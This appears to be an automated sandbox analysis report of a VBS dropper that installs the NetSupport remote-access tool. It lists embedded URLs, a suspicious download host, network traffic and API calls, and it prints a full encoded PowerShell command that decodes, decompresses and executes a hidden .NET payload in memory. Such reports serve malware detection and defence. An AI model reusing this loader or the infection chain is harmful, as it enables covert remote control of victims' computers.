                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.google.com
                                Source: pcicfgui_client.exe, 00000024.00000002.2676926399.000000006B559000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.idk.co.jp
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.intel.com/support/eduhttp://www.hp.com/go/hpclassroommanagerpEventDatam_pExhibitingm_pExh
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co-
                                Source: wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615789024.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615749480.0000000002680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: winst64.exe, 00000021.00000002.2616022842.00007FF778F25000.00000004.00000001.01000000.0000000F.sdmp, pcicfgui_client.exe, 00000024.00000002.2676556252.000000006A98E000.00000004.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp111
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000015.00000003.2484140065.000000000309A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                Source: msiexec.exe, 00000015.00000003.2484064535.000000000309F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000015.00000003.2485726143.000000000308C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com/support
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESU
                                Source: msiexec.exe, 00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.comm
                                Source: wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615789024.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615749480.0000000002680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, checkdvd.exe, 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, MSI3FCC.tmp, 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, winst64.exe, 00000021.00000000.2613701112.00007FF778F25000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2616022842.00007FF778F25000.00000004.00000001.01000000.0000000F.sdmp, MSI51C1.tmp, 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, pcicfgui_client.exe, 00000024.00000002.2676316225.000000006A967000.00000004.00000001.01000000.0000001F.sdmp, pcicfgui_client.exe, 00000024.00000002.2676556252.000000006A98E000.00000004.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://activate.netsupportsoftware.com/update
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://activate.netsupportsoftware.com/update/?s=%s?s=1234%s5678noactlc
                                Source: wscript.exe, 00000000.00000002.1750132291.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718074541.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719233043.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3ks
                                Source: wscript.exe, 00000000.00000002.1750132291.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718074541.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719233043.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drString found in binary or memory: https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.h
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://netsupportschool.com/whats_newAn
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1882351312.000000000B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://okolinabeauty.com/
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1882351312.000000000B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://okolinabeauty.com/choh/Client32.ini
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSe
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp, Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, checkdvd.exe, 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, MSI3FCC.tmp, 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, winst64.exe, 00000021.00000000.2613701112.00007FF778F25000.00000008.00000001.01000000.0000000F.sdmp, MSI51C1.tmp, 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, pcicfgui_client.exe, 00000024.00000002.2676316225.000000006A967000.00000004.00000001.01000000.0000001F.sdmp, PCICL32.DLL.22.drString found in binary or memory: https://www.netsupportschool.com/ios-android/111
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: unknownHTTPS traffic detected: 176.126.113.166:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B16A30 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,28_2_00B16A30
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B16A30 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,28_2_00B16A30
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00486A30 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,30_2_00486A30
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E93FC0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,31_2_00E93FC0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001A6A30 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,32_2_001A6A30
                                Source: client32.exe, 00000028.00000002.2770498000.000000006F91A000.00000002.00000001.01000000.00000020.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_ba398b6d-6
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,28_2_00B2F030
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2F225 __wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,28_2_00B2F225
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,30_2_0049F030
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049F225 __wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,30_2_0049F225
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,_wcsrchr,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,32_2_001BF030
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BF225 _wcsrchr,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,32_2_001BF225

                                E-Banking Fraud

                                barindex
                                Malicious encrypted Powershell command line found
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUg